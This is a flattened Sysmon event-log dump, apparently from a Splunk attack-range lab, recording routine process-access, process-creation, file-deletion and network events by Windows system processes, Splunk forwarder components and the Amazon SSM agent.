10:33:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0D8D-6216-E403-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.321{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0D8D-6216-E403-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:49.322{4F8D34B0-0D8D-6216-E403-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:50.618{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=414FDB35BD8396E6BED848380DAFF9C7,SHA256=5AD19CA7F576DD0F944EB93063A2DACA6FE9945E4468E64253BCF52995044379,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:50.992{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-117MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.485{00000000-0000-0000-0000-000000000000}2268<unknown process>-tcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53189-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 23542300x8000000000000000284633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:50.363{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F7610EFF5CC28630008B50EF5F9CC9F,SHA256=4419CD3CED76D605EB454047487ABA881D183F430736A12B70441431457C66D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:50.321{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32CBE314A5B30CFBA83BCC2D4F37F53A,SHA256=C530B6F80BF08990DA0E3D78CC3F34137BD3E2B84CD1443A43C6456B6929AEE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:50.180{4F8D34B0-0D8D-6216-E503-000000003902}32642680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000213750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.759{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3D1000277002A405017334A8904A92B,SHA256=E7DCCBA68A65AA8DFFE868130AB6E95D80BCBDADA963EF99F0D036820153371F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:51.421{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16696309BC2A0F5639B24993197260DF,SHA256=97E3CDF9B0B23514907E0E185CA112C0CF392987BA9D3BEB65B2F8C13F91A429,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0D8F-6216-E603-000000003902}688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0D8F-6216-E603-000000003902}688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.649{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0D8F-6216-E603-000000003902}688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:51.650{4F8D34B0-0D8F-6216-E603-000000003902}688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:52.961{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDFA7F77C1CD733C2E43B97A8149E8E1,SHA256=FB5C42B41A9E4BA23974A01B17ACE928FE24178DF64E945E7A768FC2683832D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:52.435{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68CEFB775DAA0D31A75F53122BFA2B4F,SHA256=C41BCACD405DE02A5259F4AA98DA587BE68903CC014A4BE5B3CEE50629DCDD7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:52.680{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F75FF7BD0B5767A1F384F4E7D6427C60,SHA256=3A2EC0C39E605E5789E567EE34DC6325F3664DBF91358958DD957CF63D28C896,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:52.294{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1FD42EABDC9CBFA38D9DCC5F2EC54E5,SHA256=DDE8C407FBD46C41EB061EACDC81D5F66C1A111546FC5484330C41CBB85FE8EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:52.000{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-118MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:53.438{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8FFCBCDF4D0D217130F91966875BEC4,SHA256=B8AF624765579AC8FC4ADF342A59E24D0DB7C69FA31CA1E28A18862EDD296A8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 